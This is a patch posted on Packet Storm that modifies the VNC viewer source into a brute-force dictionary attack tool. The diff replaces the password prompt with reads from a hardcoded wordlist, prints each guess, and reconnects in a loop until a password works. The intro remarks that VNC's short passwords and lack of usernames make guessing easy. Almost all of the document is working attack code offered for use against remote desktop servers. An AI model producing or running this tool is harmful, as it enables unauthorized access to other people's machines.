Patch to VNC which allows a brute force dictionary attack. The fun with vnc is that the password is 8 characters or smaller, and that vnc has no concept of users, which brings down the number of possibilities to try.
dd6532a7d721d5a8132dbba379d53f6798fc81a52af882ace2deed87f07405d6diff -Nrub ./rfbproto.c /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/rfbproto.c
--- ./rfbproto.c Thu Aug 12 13:07:48 1999
+++ /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/rfbproto.c Mon May 22 20:33:58 2000
@@ -59,7 +59,7 @@
* ConnectToRFBServer.
*/
-Bool
+int
ConnectToRFBServer(const char *hostname, int port)
{
unsigned int host;
@@ -76,7 +76,11 @@
return False;
}
- return SetNonBlocking(rfbsock);
+ if (! SetNonBlocking(rfbsock) ) {
+ fprintf(stderr,"Unable to set socket in non-blocking mode\n");
+
+ }
+ return (rfbsock);
}
@@ -157,7 +161,13 @@
} else if (appData.passwordDialog) {
passwd = DoPasswordDialog();
} else {
- passwd = getpass("Password: ");
+ /* passwd = getpass("Password: "); */
+ if ( fscanf(words,"%s",word)) {
+ passwd=word;
+ fprintf(stderr,"Trying password '%s'\n",passwd);
+ } else {
+ fprintf(stderr,"No more words.");
+ }
}
if ((!passwd) || (strlen(passwd) == 0)) {
diff -Nrub ./vncviewer.c /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/vncviewer.c
--- ./vncviewer.c Fri Sep 17 16:41:30 1999
+++ /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/vncviewer.c Mon May 22 22:59:10 2000
@@ -22,6 +22,8 @@
*/
#include "vncviewer.h"
+/* CHANGE THIS TO THE PATH TO YOUR DICTIONARY FILE */
+#define WORDS "/home/patrick/allwords2.txt"
char *programName;
XtAppContext appContext;
@@ -29,12 +31,24 @@
Widget toplevel;
+FILE *words;
+char word[9];
+int geitewollesock;
+
+
int
main(int argc, char **argv)
{
int i;
programName = argv[0];
+ if (!(words = fopen(WORDS,"r"))) {
+ fprintf(stderr,"Unable to open wordlist %s\n",WORDS);
+ exit(1);
+ }
+
+
+
/* The -listen option is used to make us a daemon process which listens for
incoming connections from servers, rather than actively connecting to a
given server. We must test for this option before invoking any Xt
@@ -73,12 +87,16 @@
given VNC server */
if (!listenSpecified) {
- if (!ConnectToRFBServer(vncServerHost, vncServerPort)) exit(1);
+ if ((geitewollesock = ConnectToRFBServer(vncServerHost, vncServerPort))==-1) exit(1);
}
/* Initialise the VNC connection, including reading the password */
-
- if (!InitialiseRFBConnection()) exit(1);
+ while (! InitialiseRFBConnection()) {
+ close(geitewollesock);
+ if ((geitewollesock = ConnectToRFBServer(vncServerHost, vncServerPort))==-1) {
+ exit(1);
+ }
+ }
/* Create the "popup" widget - this won't actually appear on the screen until
some user-defined event causes the "ShowPopup" action to be invoked */
diff -Nrub ./vncviewer.h /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/vncviewer.h
--- ./vncviewer.h Thu Aug 12 13:06:41 1999
+++ /usr/ports/net/vnc/work/vnc_unixsrc/vncviewer/vncviewer.h Mon May 22 20:03:07 2000
@@ -228,3 +228,6 @@
extern XtAppContext appContext;
extern Display* dpy;
extern Widget toplevel;
+
+extern FILE *words;
+extern char word[9];
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed